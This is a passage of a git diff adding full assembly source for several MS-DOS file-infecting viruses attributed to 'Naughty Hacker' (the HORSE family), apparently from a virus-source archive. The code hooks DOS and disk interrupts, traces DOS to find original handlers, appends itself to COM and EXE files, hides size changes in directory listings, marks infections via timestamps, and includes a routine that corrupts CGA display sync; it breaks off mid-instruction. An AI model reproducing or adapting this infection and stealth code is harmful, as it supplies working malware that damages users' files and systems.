virus CODE size + PUSH DX ; Save it to stack + MOV CX,9h ; Compute virus size in + SHR DX,CL ; 512 pages + ADD [SI+04h],DX ; Increase EXE file header size field + ; with virus pages + POP DX ; Restore virus size in DX + AND DX,01FFh ; Compute reminder from VirusSize/512 + ADD DX,[SI+02] ; Save value in EXE header + CMP DX,0200 ; Check virus reminder + JL NoAdjustRem ; If less than 512 -> no adjust + SUB DX,0200 ; Else decrease reminder + INC word ptr [SI+04] ; Increase EXE header page count +NoAdjustRem: + MOV [SI+02],DX ; Save correct reminder in EXE header + MOV AX,[SI+08] ; Load AX with file size in paragraphs + SUB DX,DX ; Set DX to Zero + + CALL LongMultiple16 ; Get DX:AX file size in bytes + SUB [offset FileSizeLow],AX ; Correct saved file size + SBB [offset FileSizeHi],DX + MOV AX,[FileSizeLow] ; Load DX:AX with corrected file size + MOV DX,[offset FileSizeHi] + CALL LongMultiple16 ; DX:AX *= 0x10 + MOV CX,0008 ; Calculate new entry CS:IP + SHL DX,CL ; DX/=0x100 + MOV CX,0004 + SHR AX,CL ; AX/=0x10 + MOV [SI+14],AX ; Set entry CS:IP to EXE header + MOV [SI+16],DX + MOV [NewCS],DX ; Save new entry CS + ADD DX,0200 ; Calculate new entry SS + MOV [SI+0E],DX ; Store it to EXE header + +DoInfect: + MOV ES:[DI+04],0000 ; Set file pointer to 0L + MOV ES:[DI+06],0000 + PUSH ES:[DI-02] ; Save file date/time on stack + PUSH ES:[DI-04] + SUB CX,CX ; Set CX to 0 + XCHG CX,ES:[DI-0Dh] ; Load CX file attrib/set file attrib to 0 + PUSH CX ; Save file attrib to stack + MOV AH,40 ; Write file + MOV DX,offset LastByte ; EXE header + MOV CX,001B ; Rewrite modified EXE header + INT 21 ; Do write + JC BadWrite ; If error skip file + MOV AX,ES:[DI] ; Set file pointer + MOV ES:[DI+04],AX + MOV AX,ES:[DI+02] ; to end of file + MOV ES:[DI+06],AX ; + MOV AH,40 ; Will write + SUB DX,DX ; Virus offset + MOV CX,offset LastCode ; Virus size + INT 21 ; Write virus to EXE file + +BadWrite: + POP CX ; Restore file attrib from stack + MOV ES:[DI-0Dh],CX ; Set attrib of file + POP CX ; Restore file date/time from stack + POP DX + OR byte ptr ES:[DI-0Bh],40 ; Set DO NOT UPDATE TIME flag in table + JC NoFuckTime ; If write error -> Set normal time + OR CX,001F ; Else set file seconds to 62 +NoFuckTime: + MOV AX,5701 ; Set file date/time + INT 21 ; Via int21 +SkipFile: + MOV AH,3E ; CloseFile + INT 21 + OR byte ptr ES:[DI-0Ch],40 ; ???? + SUB AX,AX ; Set DS to 0 + MOV DS,AX + POP AX ; Restore int 13 seg + MOV [004E],AX ; Restore vector 13 seg + POP AX ; Restore int 13 off + MOV [004C],AX ; Restore vector 13 off + POP AX ; Restore int 24 seg + MOV [0092],AX ; Restore vector 24 seg + POP AX ; Restore int 24 off + MOV [0090],AX ; Restore vector 24 off + POP AX ; Restore int 21 seg + MOV [0086],AX ; Restore vector 21 seg + POP AX ; Restore int 21 off + MOV [0084],AX ; Restore vector 21 off + POP AX ; Restore int 8 seg + MOV [0022],AX ; Restore vector 8 seg + POP AX ; Restore int 8 off + MOV [0020],AX ; Restore vector 0 off + JMP ErrorProcess ; Update counter +InfectCom: + TEST byte ptr ES:[DI-0Dh],04 ; Check for SYSTEM file + JNZ OkComFile ; If file IS system -> Damage file ????? + PUSH SI ; Save buffer offset + CMP ES:[DI+17],43 ; Check if file ext begin with 'C' + JNZ OkComFile ; If no -> damage file + MOV byte ptr [ComFlag],43 ; Set file type flag to COM + LODSW ; Load first 2 bytes of file + MOV CS:[First3],AX ; And save them + LODSW ; Load seconf 2 bytes of file + MOV CS:[First3+2],AX ; And save them + MOV AX,ES:[DI] ; Load AX with file size + CMP AX,0FA76h ; Check file size + POP SI ; Restore buffer offset + JC OkComFile ; If file is less than 64118 bytes -> OK infect + JMP short SkipFile ; else skip file +OkComFile: + SUB AX,0003 ; Calculate jump argument + MOV byte ptr [SI],0E9h ; Set first instruction to near JMP + MOV [SI+01],AX ; Store JMP argument + JMP DoInfect ; Go write buffer + +LongMultiple16: + PUSH CX ; Save CX + MOV CX,0004 ; Will repeat 4 times +DoMult: + SHL AX,1 ; Mult DX:AX * 2 + RCL DX,1 ; + LOOP DoMult ; Repeat 4 times -> 2^4 = 16 + POP CX ; Restore CX + RET ; Return to caller +SetUp: + MOV AH,52 ; Get DOS's table of table address + INT 21 ; in ES:BX + MOV CS:[Offset TableSegment],es ; Save table segment + ; Virus treat this segment as DOS segment + ; He assume int21 seg == to DOS segment + ; That's why virus will fail on DOS 5.X + CLI ; Disable interrupts + SUB AX,AX ; Set AX to 0 + MOV DS,AX ; Set DS point to interrupt vectors + MOV [0004],offset Debugger ; Set vector 1 (trap) offset + MOV [0006],CS ; ; Set vector 1 (trap) seg + MOV AX,[00BC] ; Load int2F off + MOV CS:[offset Int2Foff],AX ; and save it + MOV AX,[00BE] ; Load int2F seg + MOV CS:[offset Int2Fseg],AX ; and save it + STI ; Enable interrupts + PUSHF ; Save flags + PUSHF ; Save flags + POP AX ; Get flags in AX + OR AX,0100 ; Set TF to 1 (trace mode) + PUSH AX ; Put flags back to stack + POPF ; Begin trace + SUB AX,AX ; AX = 0 + DEC AH ; AX = FF00 ??? + CALL dword ptr [0084] ; Call DOS (trace mode active) + MOV SI,0004 ; SI = 4 + MOV DS,SI ; DS = SI = 4 + MOV AH,30 ; Get DOS version + INT 21 ; Via int21 + CMP AX,1E03 ; Check DOS 3.30 + LES AX,[SI+08] ; Load ES:AX with int13 address + JB OkInt13 ; If DOS vers < 3.30 -> ignore BIOS address load/check + LES AX,[0770+SI] ; then load ES:DX with BIOS address of int13 + ; simulate int2F, AH=13 + MOV BX,ES ; BX:AX int13 BIOS address + CMP BX,0C800h ; If int13 seg >= C800 + JAE OkInt13 ; Then address is in BIOS, all OK + + CLI ; else HALT system + HLT +OkInt13: + MOV CS:[offset Int13off],AX ; Save in13 address + MOV CS:[offset Int13seg],ES + IRET ; Return to caller, setup complete + +Debugger: + PUSH BP ; Save BP + MOV BP,SP ; BP point to stack top + PUSH BX ; Save BX + MOV BX,CS:[offset TableSegment] ; Load BX with DOS segment + CMP SS:[BP+04],BX ; Check debugged address + JNZ ContinueDebug ; If not in DOS -> continue + MOV BX,SS:[BP+02] ; else load BX with int21 off + MOV CS:[offset Dos21off],BX ; and save it + AND SS:[BP+06],0FEFFh ; Clear trap flag +ContinueDebug: + POP BX ; Restore BX + POP BP ; Restore BP + IRET ; Continue trace if require or + ; continue int21 execution without trace + +; Next subroutine fuck you CGA display (don't affect EGA). +; Fucking result could be fix by dos MODE command + +VideoFuck: + MOV DX,03D4h ; Select CGA register selector + MOV AL,02 ; Select CRT register 2 (horiz sync) + OUT DX,AL ; Do selection + MOV AL,0FFh ; New sync value + MOV DX,03D5h ; Select CGA register value writer + ; This could be INC DX; That save 1 byte + OUT DX,AL ; Fuck horiz sync + JMP EndInt21 ; Terminate int21 request +CallDOS: + PUSHF ; Save flags + CALL dword ptr CS:[offset Dos21off] ; Call ORIGINAL int21 + RET ; Return to caller +CallInt2F: + PUSHF ; Save flags + CALL dword ptr CS:[offset Int2Foff] ; Call SAVED int2F + RET ; Return to caller +TimerHandler: + PUSHF ; Save flags + CALL dword ptr CS:[offset TimerOff] ; Call original timer + PUSH AX ; Save AX + PUSH DS ; Save DS + SUB AX,AX ; Set DS to interrupt table + MOV DS,AX + CLI ; Disable interrupts + MOV AX,CS:[offset Int13off] ; Restore int13 address + MOV [004C],AX + MOV AX,CS:[offset Int13seg] + MOV [004E],AX + + MOV [0020],offset TimerHandler ; Set int8 + MOV [0022],CS + + MOV AX,CS:[offset Dos21off] ; Restore int21 address + MOV [0084],AX + MOV AX,CS:[offset TableSegment] + MOV [0086],AX + + MOV AX,offset CriticalError ; Set int24 + MOV [0090],AX + MOV [0092],CS + + STI ; Enable interrupts + POP DS ; Restore DS + POP AX ; Restore AX + IRET ; Terminate timing +CriticalError: + MOV AL,03 ; If critical error + IRET ; then simulate Ignore +VirusAuthor: + db 'Sofia,Feb ' + db 27h + db '91 Naughty Hacker.' ; Replace this string with HORSE +EndAuthor: + + +LastCode label byte ; This is virus in file + +Int21off: DW 0 ; Variable area +Int21seg: DW 0 ; NOT writed in file +Int2Foff: DW 0 +Int2Fseg: DW 0 +TimerOff: DW 0 +TimerSeg: DW 0 +Int13off: DW 0 +Int13seg: DW 0 +Dos21off: DW 0 +TableSegment: DW 0 +FileSizeLow: DW 0 +FileSizeHi: dw 0 +FunCounter: dw 0 ; Executed function counter +LastByte: label byte ; Memory size of virus diff --git a/MSDOS/Virus.MSDOS.Unknown.horse4.asm b/MSDOS/Virus.MSDOS.Unknown.horse4.asm new file mode 100644 index 00000000..9d9096fe --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.horse4.asm @@ -0,0 +1,958 @@ + + .radix 16 + + + ;********************************* + ;* The Naughty Hacker's virus * + ;*VERSION 3.1 (And not the last.)* + ;* ( V1594 ) * + ;* Finished on the 10.04.1991 * + ;* * + ;* Glad to meet you friend! * + ;* * + ;********************************* + +; +; "It's hard to find a black cat in a dark room, especially if it's not there." +; +; V1594 ( !@!?!). +; () , +; , +; , +; . +; ...... +; +; TURBO ASSEMBLER Ver 1.03B. +; .... +; +; VIRUSWRITERS ! +; +; +; To be continued ... +; + + + call Start_Virus + mov dx,offset Hellomsg + mov ah,9 + int 21 + int 20 + +Hellomsg db 0a,0dh,7,'HI WORLD,GIVE ME COMMAND.COM !!!',0a,0dh,7,'$' + + Virus_lenght equ endcode-adjust + alllen equ buffer-adjust + + adjust label word + + + IP_save label word + + First_3 Label Byte + ;For .COM file here stores + ret + nop + nop + + CS_save dw ? ;The first 3 bytes + SP_save dw ? + SS_save dw 0FFFF ;0FFFF For COM files + + +signature: + + db 'N.Hacker' ;It's me the HORSE !!! + +date_stamp: + + dd 10041991 ;10.04.1991 + +Run_The_Program: + + pop ds ;Restore saved ds,es,ax + pop es ;ds=es=PSP + pop ax + cmp cs:[bp+SS_save-adjust],0FFFF ;Run the infected program + je Run_COM_File + + mov ax,ds ;Calculate load segment + add ax,10 + mov bx,ax + add ax,cs:[bp+CS_save-adjust] ;Calculate CS value + add bx,cs:[bp+SS_save-adjust] ;Calculate SS value + mov ss,bx ;Run .EXE program + mov sp,word ptr cs:[bp+SP_save-adjust] + push ax + push word ptr cs:[bp+IP_save-adjust] + retf + +Run_COM_File: + + mov di,100 + mov si,bp + movsb ;Restore the first 3 bytes + movsw ;Run .COM program + mov bx,100 + push bx + sub bh,bh + ret + +;******************************************************************* +; * +; This is the program entry.... * +; * +;******************************************************************* + + +Start_Virus: + + call Get_IP ;This is to get the IP value. + +Get_IP: + pop bp ;Get it in BP. + sub bp,Get_IP-adjust ;adjust BP point to the begining + cld ;Clear direction flag + push ax ;Save some registres + push es + push ds + mov es,[2] ;get last segment + mov di,Run_The_Program-adjust ;(last segment=segment of virus) + + push ds + push cs + pop ds + mov si,di + add si,bp + mov cx,endcode-Run_The_Program + rep cmpsb ;check if virus is in memory + pop ds + push ds + pop es + je Run_The_Program ;If so then run the program + + mov word ptr cs:[bp+handle-adjust],0ffff ;set handle_save + mov ax,ds + dec ax + mov ds,ax ;ds=MCB + sub word ptr [3],80 ;Set block size + sub word ptr [12],80 ;Set last segment + mov es,[12] ;steal some memory (2K) + push cs + pop ds + sub di,di + mov si,bp ;prepare to move in high mem + mov cx,alllen ;will move virus+variables + rep movsb ;copy there + push cs + mov ax,Run_The_Program-adjust + add ax,bp + push ax + push es + mov ax,offset Set_Vectors-adjust ;Set vectors + push ax + retf + +Find_First_Next: + + call Call_Original_INT_21h ;fuck when do the dir command + push bx + push es + push ax + or al,al + jnz Go_Out_ ;if error + + mov ah,2f ;get DTA address + int 21 + + mov al,byte ptr es:[bx+30d] ;Seconds in al + and al,31d ;Mask seconds + cmp al,60d/2 ;Seconds=60? + jne Go_Out_ + + mov ax,es:[bx+36d] + mov dx,es:[bx+38d] ;Check File size + cmp ax,Virus_lenght*2 + sbb dx,0 + jb Go_Out_ + + +Adjust_Size: + + sub es:[bx+28d+7+1],Virus_lenght ;Adjust size + sbb es:[bx+28d+2+7+1],0 + +Go_Out_: + + pop ax + pop es ;Return to caller + pop bx + iret + +Find_First_Next1: + + call Call_Original_INT_21h + pushf + push ax + push bx ;fuck again + push es + jc Go_Out_1 + + mov ah,2f + int 21 + + mov al,es:[bx+22d] + and al,31d + cmp al,60d/2 + jne Go_Out_1 + + mov ax,es:[bx+26d] + mov dx,es:[bx+28d] + cmp ax,Virus_lenght*2 + sbb dx,0 + jb Go_Out_1 + +Adjust_Size1: + + sub es:[bx+26d],Virus_lenght + sbb es:[bx+28d],0 + +Go_Out_1: + + pop es + pop bx + pop ax ; Dummy proc far + popf ; ret 2 + db 0ca,2,0 ;retf 2 ; Dummy endp => BUT too long... + + + ;************************************* + ; * + ; Int 21 entry point. * + ; * + ;************************************* + + + +INT_21h_Entry_Point: + + + cmp ah,11 + je Find_First_Next ;Find First Next (old) + cmp ah,12 + je Find_First_Next + + cmp ah,4e ;Find First Next (new) + je Find_First_Next1 + cmp ah,4f + je Find_First_Next1 + + cmp ah,6ch + jne not_create ;Create (4.X) + test bl,1 + jz not_create + jnz create + +not_create: + + cmp ah,3ch ;Create (3.X) + je create + cmp ah,5bh + je create + + push ax + push bx + push cx + push dx + push si + push di + push bp + push ds + push es + + mov byte ptr cs:[function-adjust],ah + + cmp ah,6ch ;Open (4.X) + je create_ + + cmp ah,3e ;Close + je close_ + + cmp ax,4b00 ;Exec + je Function_4Bh + + cmp ah,17 ;Rename (old) + je ren_FCB + + cmp ah,56 ;Rename (new) + je Function_4Bh + + cmp ah,43 ;Change attributes + je Function_4Bh + + cmp ah,3dh ;Open (3.X) + je open + +Return_Control: + + pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + +Go_out: + + jmp dword ptr cs:[current_21h-adjust] ;go to the old int 21 + +create_: + + or bl,bl ;Create file? + jnz Return_Control + mov dx,si + jmp Function_4Bh + +ren_FCB: + + cld + inc dx + mov si,dx + mov di,offset buffer-adjust + push di + push cs + pop es ;Convert FCB format Fname into ASCIIZ string + mov cx,8 + rep movsb + mov al,'.' + stosb + mov cx,3 + rep movsb + sub al,al + stosb + pop dx + push cs + pop ds + jmp Function_4Bh + +create: + +; cmp word ptr cs:[handle-adjust],0ffff +; jne Go_out + + call Call_Original_INT_21h + jc Error + mov word ptr cs:[handle-adjust],ax + jnc Exit_ +Error: + mov word ptr cs:[handle-adjust],0ffff ;Useless +Exit_: +; retf 2 + db 0ca,2,0 + +close_: + cmp word ptr cs:[handle-adjust],0ffff + je Return_Control + cmp bx,word ptr cs:[handle-adjust] + jne Return_Control + + mov ah,45 + call Infect_It + mov word ptr cs:[handle-adjust],0ffff + jmp Return_Control + +Function_4Bh: + + mov ax,3d00h +open: + call Infect_It + jmp Return_Control + +;****************************************** +; * +; This infects the programs... * +; * +;****************************************** + +Infect_It: + + call Call_Original_INT_21h ;this is the infecting part + jnc No_error + ret + +No_error: + + xchg ax,bp + mov byte ptr cs:[flag-adjust],0 + mov ah,54 + call Call_Original_INT_21h + mov byte ptr cs:[veri-adjust],al + cmp al,1 ;Switch off verify... + jne Go_On_Setting + mov ax,2e00 + call Call_Original_INT_21h + +Go_On_Setting: + + push cs + push cs + pop ds + pop es + mov dx,offset DOS_13h-adjust + mov bx,dx ;Set New DOS int 13h + mov ah,13 + call Call_Original_INT_2Fh + + mov ax,3513 + call Call_Original_INT_21h + push bx + push es + + mov word ptr cs:[current_13h-adjust],bx + mov word ptr cs:[current_13h-adjust+2],es + + mov ah,25 + mov dx,INT_13h_entry-adjust ;Set int 13h + push cs + pop ds + call Call_Original_INT_21h + + mov ax,3524 + call Call_Original_INT_21h + push bx + push es + + mov ah,25 + mov dx,INT_24h_entry-adjust ;Set int 24h (Useless maybe...). + call Call_Original_INT_21h + + xchg bx,bp + push bx + mov ax,1220 + call Call_Original_INT_2Fh + mov bl,es:[di] ;Remember the good old V512 ? + mov ax,1216 + call Call_Original_INT_2Fh + pop bx + add di,11 + + mov byte ptr es:[di-15d],2 + mov ax,es:[di] + mov dx,es:[di+2] + cmp ax,Virus_lenght+1 + sbb dx,0 + jnb Go_on + jmp close +Go_on: + cmp byte ptr cs:[function-adjust],3dh + je Scan_name + cmp byte ptr cs:[function-adjust],6ch + jne Dont_Scan_Name + +Scan_name: + + push di + add di,0f + mov si,offset fname-adjust ;wasn't that the last opened file? + cld + mov cx,8+3 + rep cmpsb + pop di + jne Dont_Scan_Name + jmp close + +Dont_Scan_Name: + + cmp es:[di+18],'MO' + jne Check_For_EXE ;check for .COM file + cmp byte ptr es:[di+17],'C' + jne Check_For_EXE + jmp com + +Check_For_EXE: + + cmp es:[di+18],'EX' + jne Not_good ;check for .EXE file + cmp byte ptr es:[di+17],'E' + je Check_For_Valid_EXE + +Not_good: + + jmp close + +Check_For_Valid_EXE: + + call Read_First_18 + cmp word ptr [si],'ZM' + je Valid_EXE ;check for valid .EXE file + cmp word ptr [si],'MZ' + je Valid_EXE + jmp close + + Valid_EXE: + + cmp word ptr [si+0c],0ffff ;only low-mem .EXE + je Low_Mem + jmp close + +Low_Mem: + + mov cx,[si+16] + add cx,[si+8] ;Something common with EDDIE.. + mov ax,10 + mul cx + add ax,[si+14] + adc dx,0 + mov cx,es:[di] + sub cx,ax + xchg cx,ax + mov cx,es:[di+2] + sbb cx,dx + or cx,cx + jnz Not_Infected_EXE ;infected? + cmp ax,(endcode-Start_Virus) + jne Not_Infected_EXE + jmp close + +Not_Infected_EXE: + + mov ax,[si+10] + mov [SP_save-adjust],ax + mov ax,[si+0e] + mov [SS_save-adjust],ax + mov ax,[si+14] + mov [IP_save-adjust],ax + mov ax,[si+16] + mov [CS_save-adjust],ax ;set the new header + mov ax,es:[di] + mov dx,es:[di+2] + + add ax,Virus_lenght + adc dx,0 + mov cx,200 ;(C) by Lubo & Jan... + div cx + mov [si+2],dx + or dx,dx + jz OK_MOD + inc ax + +OK_MOD: + mov [si+4],ax + mov ax,es:[di] + mov dx,es:[di+2] + + mov cx,4 + push ax + +Compute: + + shr dx,1 + rcr ax,1 + loop Compute + pop dx + and dx,0f + + sub ax,[si+8] + add dx,Start_Virus-adjust + adc ax,0 + mov [si+14],dx + mov [si+16],ax + add ax,(Virus_lenght)/16d+1 + mov [si+0eh],ax + mov [si+10],100 + write: + mov ax,5700 + call Call_Original_INT_21h + push cx + push dx + + sub cx,cx + mov es:[di+4],cx + mov es:[di+6],cx + mov cl,20 + xchg cl,byte ptr es:[di-0dh] + push cx + mov ah,40 ;this writes the first few bytes and glues the virus + mov dx,buffer-adjust + mov cx,18 + + call Call_Original_INT_21h + mov ax,es:[di] + mov es:[di+4],ax + mov ax,es:[di+2] + mov es:[di+6],ax + call Check_For_COMMAND ;(C) + jne Dont_Adjust_Size + sub es:[di+4],Virus_lenght + sbb es:[di+6],0 ;??????????????????????????????? + +Dont_Adjust_Size: + + mov ah,40 + sub dx,dx + mov cx,Virus_lenght + call Call_Original_INT_21h + + pop cx + mov byte ptr es:[di-0dh],cl + pop dx + pop cx + + cmp byte ptr cs:[flag-adjust],0ff + je Set_Time_and_Date +exit: + call Check_For_COMMAND + je Set_Time_and_Date + and cl,11100000b + or cl,60d/2 + +Set_Time_and_Date: + + mov ax,5701 + call Call_Original_INT_21h +close: + + mov ah,3e + call Call_Original_INT_21h + push es + pop ds + mov si,di + add si,0f + mov di,fname-adjust + push cs + pop es + mov cx,8+3 ;save the fname to a quit place + cld + rep movsb + push cs + pop ds + + cmp byte ptr cs:[flag-adjust],0ff + jne Dont_Clear_Buffers + mov ah,0dh ;if error occured->clear disk buffers + + call Call_Original_INT_21h + +Dont_Clear_Buffers: + + les bx,[org_13h-adjust] + lds dx,[org_13h-adjust] + mov ah,13 + call Call_Original_INT_2Fh + + cmp byte ptr cs:[veri-adjust],1 + jne Restore_Vectors + mov ax,2e01 + + call Call_Original_INT_21h + +Restore_Vectors: + + sub ax,ax + mov ds,ax + pop [24*4+2] + pop [24*4] + pop [13*4+2] + pop [13*4] ;restore vectors and return + ret + com: + test byte ptr es:[di-0dh],4 ;if it is a system file + jnz Not_OK_COM_File ;I had some problems here with + ;V1160 & V1776 (with the ball) + cmp es:[di],65535d-Virus_lenght*2-100 + ja Not_OK_COM_File + + call Read_First_18 + cmp byte ptr [si],0E9 + jne OK_COM_file + mov ax,es:[di] + sub ax,[si+1] ;infected? + cmp ax,(endcode-Start_Virus+3) + je Not_OK_COM_File + +OK_COM_file: + + mov word ptr [SS_save-adjust],0FFFF + push si + lodsb + mov word ptr [First_3-adjust],ax + lodsw + mov word ptr [First_3-adjust+1],ax + pop si + mov ax,es:[di] + add ax,Start_Virus-adjust-3 + call Check_For_COMMAND + jne Normally + sub ax,Virus_lenght + +Normally: + + mov byte ptr [si],0E9 + mov word ptr [si+1],ax + jmp write + +Not_OK_COM_File: + + jmp close + +Set_Vectors: + + sub ax,ax + mov ds,ax + + push [1*4] + push [1*4+2] ; <= (C) by N.Hacker. + + pushf + pushf + pushf + pushf + + mov byte ptr cs:[flag-adjust],ah + mov byte ptr cs:[my_flag-adjust],ah + mov word ptr cs:[limit-adjust],300 + mov word ptr cs:[mem_-adjust],org_21h-adjust + + mov [1*4],offset trap-adjust + mov [1*4+2],cs + + call set_trace + + mov ax,3521 + + call dword ptr [21h*4] + + + mov byte ptr cs:[flag-adjust],0 + mov word ptr cs:[mem_-adjust],org_2fh-adjust + + call set_trace + + mov ax,1200 + + call dword ptr [2fh*4] ;do trace int 2f + + + mov byte ptr cs:[flag-adjust],0 + mov byte ptr cs:[my_flag-adjust],0FF + mov word ptr cs:[limit-adjust],0C800 + mov word ptr cs:[mem_-adjust],org_13h-adjust + + call set_trace + + sub ax,ax + mov dl,al + + call dword ptr [13h*4] ;do trace int 13 + + mov byte ptr cs:[flag-adjust],0 + mov word ptr cs:[limit-adjust],0F000 + mov word ptr cs:[mem_-adjust],Floppy_org_13h-adjust + + call set_trace + + sub ax,ax + mov dl,al + + call dword ptr [13h*4] + + pop [1*4+2] + pop [1*4] + + les ax,[21*4] + mov word ptr cs:[current_21h-adjust],ax ;get old int 21 + mov word ptr cs:[current_21h-adjust+2],es + mov [21*4], INT_21h_Entry_Point-adjust ;set it + mov [21*4+2],cs + retf + +set_trace: + + pushf + pop ax + or ax,100 + push ax + popf + ret + +trap: + push bp + mov bp,sp + push bx + push di + cmp byte ptr cs:[flag-adjust],0ff + je off + mov di,word ptr cs:[mem_-adjust] + mov bx,word ptr cs:[limit-adjust] + cmp [bp+4],bx + pushf + cmp word ptr cs:[my_flag-adjust],0ff + jne It_Is_JA + + popf + jb Go_out_of_trap + jmp It_Is_JB + +It_Is_JA: + + popf + ja Go_out_of_trap + +It_Is_JB: + + mov bx,[bp+2] + mov word ptr cs:[di],bx + mov bx,[bp+4] + mov word ptr cs:[di+2],bx + mov byte ptr cs:[flag-adjust],0ff +off: + and [bp+6],0feff + +Go_out_of_trap: + + pop di + pop bx + pop bp + iret + +Call_Original_INT_21h: + + pushf + call dword ptr cs:[org_21h-adjust] + ret + +Call_Original_INT_2Fh: + + pushf + call dword ptr cs:[org_2fh-adjust] + ret + +INT_24h_entry: + + mov al,3 + iret + +;************************** +; (C) by N.Hacker. * +; (bellow) * +;************************** + +INT_13h_entry: + + mov byte ptr cs:[next_flag-adjust],0 + + cmp ah,2 + jne Other + + cmp byte ptr cs:[function-adjust],03Eh + jne Dont_hide + + dec byte ptr cs:[next_flag-adjust] + inc ah + jmp Dont_hide + +Other: + + cmp ah,3 + jne Dont_hide + + cmp byte ptr cs:[flag-adjust],0ff + je no_error_ + + cmp byte ptr cs:[function-adjust],03Eh + je Dont_hide + + inc byte ptr cs:[next_flag-adjust] + dec ah + +Dont_hide: + + pushf + call dword ptr cs:[current_13h-adjust] + jnc no_error_ + mov byte ptr cs:[flag-adjust],0ff + +no_error_: + + clc + db 0ca,02,0 ;retf 2 + + +DOS_13h: + + cmp byte ptr cs:[next_flag-adjust],0 + je OK + + cmp ah,2 + je Next + cmp ah,3 + jne OK +Next: + cmp byte ptr cs:[next_flag-adjust],1 + jne Read + inc ah + jne OK +Read: + + dec ah +OK: + test dl,80 + jz Floppy + jmp dword ptr cs:[org_13h-adjust] +Floppy: + jmp dword ptr cs:[Floppy_org_13h-adjust] + + +Read_First_18: + + sub ax,ax + mov es:[di+4],ax + mov es:[di+6],ax + mov ah,3f + mov cx,18 + mov dx,buffer-adjust + mov si,dx + call Call_Original_INT_21h + ret + +Check_For_COMMAND: + + cmp es:[di+0f],'OC' + jne Not_COMMAND + cmp es:[di+11],'MM' + jne Not_COMMAND + cmp es:[di+13],'NA' + jne Not_COMMAND ;check for command.com + cmp es:[di+15],' D' + jne Not_COMMAND + cmp es:[di+17],'OC' + jne Not_COMMAND + cmp byte ptr es:[di+19],'M' + +Not_COMMAND: + + ret + +endcode label word + + current_21h dd ? + null dd ? ;I forgot to remove this variable... + current_13h dd ? + org_2fh dd ? + org_13h dd ? + org_21h dd ? + Floppy_org_13h dd ? + flag db ? ;0ff if error occures + veri db ? + handle dw ? + fname db 8+3 dup (?) + function db ? + my_flag db ? + limit dw ? + mem_ dw ? + next_flag db ? + +buffer label word + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.horse5.asm b/MSDOS/Virus.MSDOS.Unknown.horse5.asm new file mode 100644 index 00000000..28c93005 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.horse5.asm @@ -0,0 +1,866 @@ + .radix 16 + + ;WARNING: THIS IS NOT A BASIC RELEASE BUT A WORK COPY! + ;It seems that somebody had steal this version and + ;circulates it now. + + title The Naughty Hacker's virus version 3.0 + comment / Naughty Hacker wishes you the best ! / + + jmp start + + virlen equ offset endcode-offset begin + alllen equ offset buffer-offset begin + +begin label word + + IP_save dw 20cdh + CS_save dw ? + SS_save dw ? + far_push dw ? + ident db 'C' +start: + call inf +inf: + pop bp + sub bp,offset start-offset begin+3 + push es + push ds + mov es,es:[2] + mov di,start-begin + push ds + push cs + pop ds + mov si,di + add si,bp + mov cx,endcode-inf + cld + rep cmpsb + pop ds + push ds + pop es + je run +ina: + cmp word ptr [0],20cdh + je urud + jmp run +urud: + mov word ptr cs:[bp+handle-begin],0ffff + mov word ptr cs:[bp+counter-begin],2345 + mov ax,ds + dec ax + mov ds,ax + sub word ptr [3],80 + mov ax,es:[2] + sub ax,80 + mov es:[2],ax + push ax + + sub di,di + mov si,bp + mov ds,di + pop es + push cs + pop ds + mov cx,alllen + rep movsb + push cs + mov ax,offset run-begin + add ax,bp + push ax + push es + mov ax,offset inss-100-3 + push ax + retf +run: + pop ds + pop es + cmp byte ptr cs:[bp+ident-begin],'C' + je comfile + mov dx,cs:[bp+CS_save-begin] + mov cx,cs + sub cx,word ptr cs:[bp+far_push-begin] + add dx,cx + add cx,cs:[bp+SS_save-begin] + cli + mov ss,cx + sti +clear: + push dx + push word ptr cs:[bp+IP_save-begin] + call clearr + retf +comfile: + mov ax,cs:[bp+IP_save-begin] + mov [100],ax + mov ax,cs:[bp+CS_save-begin] + mov [102],ax + mov ax,100 + push ax + call clearr + retn +cur: + call exec + push bx + push es + push si + push ax + mov si,dx + cmp byte ptr [si],0ff + jne puf + mov ah,2f + call exec + + mov al,byte ptr es:[bx+22d+7+1] + and al,31d + cmp al,31d + jnz puf + cmp word ptr es:[bx+28d+2+7+1],0 + jne scs + cmp word ptr es:[bx+28d+7+1],virlen*2 + jb puf +scs: + sub word ptr es:[bx+28d+7+1],virlen + sbb word ptr es:[bx+28d+2+7+1],0 +puf: + pop ax + pop si + pop es + pop bx + iret + +inff: + dec word ptr cs:[counter-begin] + jnz neass + call shop +neass: + cmp ah,11 + je cur + cmp ah,12 + je cur + + cmp ah,4e + jne cur1.1 + jmp cur1 +cur1.1: + cmp ah,4f + jne cur1.2 + jmp cur1 +cur1.2: + cmp ah,3ch + je create + cmp ah,5bh + je create + + push ax + push bx + push cx + push dx + push si + push di + push bp + push ds + push es + + mov byte ptr cs:[function-begin],ah + + cmp ah,3dh + je open + + cmp ah,3e + je close_ + + cmp ax,4b00 + je execute + + cmp ah,17 + je ren_FCB + + cmp ah,56 + je execute + + cmp ah,43 + je execute + +here: + pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + jmp dword ptr cs:[current_21h-begin] + +ren_FCB: + call transfer + call coont + jmp here + +create: + call exec + mov word ptr cs:[handle-begin],ax + db 0ca,2,0 +close_: + cmp word ptr cs:[handle-begin],0ffff + je here + cmp bx,word ptr cs:[handle-begin] + jne here + mov ah,45 + call coont + mov word ptr cs:[handle-begin],0ffff + jmp here +execute: + mov ah,3dh + call coont + jmp here +open: + call coont + jmp here +cur1: + call exec + pushf + push ax + push bx + push es + + mov ah,2f + call exec + + mov al,es:[bx+22d] + and al,31d + cmp al,31d + jne puf1 + + cmp es:[bx+28d],0 + jne scs1 + cmp es:[bx+26d],virlen*2 + jb puf1 +scs1: + sub es:[bx+26d],virlen + sbb es:[bx+28d],0 +puf1: + pop es + pop bx + pop ax + popf + db 0ca,2,0 ;retf 2 +coont: + call exec + jnc ner + ret +ner: + mov bp,ax + mov byte ptr cs:[flag-begin],0 + mov ah,54 + call exec + mov byte ptr cs:[veri-begin],al + cmp al,1 + jne rty + mov ax,2e00 + call exec +rty: + mov ax,3508 + call exec + mov word ptr cs:[current_08h-begin],bx + mov word ptr cs:[current_08h-begin+2],es + push bx + push es + mov al,21 + call exec + push bx + push es + mov al,24 + call exec + push bx + push es + mov al,13 + call exec + push bx + push es + mov ah,25 + mov 